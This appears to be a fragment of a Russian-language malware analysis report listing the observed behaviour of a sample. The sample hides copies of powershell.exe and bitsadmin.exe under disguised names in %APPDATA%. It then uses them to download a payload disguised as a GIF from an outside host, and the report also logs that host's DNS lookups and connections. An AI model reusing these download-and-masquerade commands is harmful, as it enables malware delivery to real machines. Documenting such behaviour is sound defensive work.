Техническая информация
- '%APPDATA%\ebosrsrf.exe' /transfer MTeAHm /download https://nowyouknowent.com/werdona/01189540212/1x1.gif %APPDATA%\1x1.gif
- %APPDATA%\pebosrsrf.exe
- %APPDATA%\ebosrsrf.exe
- 'no####knowent.com':443
- DNS ASK no####knowent.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\peBOSRsrf.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\eBOSRsrf.exe' (со скрытым окном)
- '%APPDATA%\ebosrsrf.exe' /transfer MTeAHm /download https://nowyouknowent.com/werdona/01189540212/1x1.gif %APPDATA%\1x1.gif' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\peBOSRsrf.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\eBOSRsrf.exe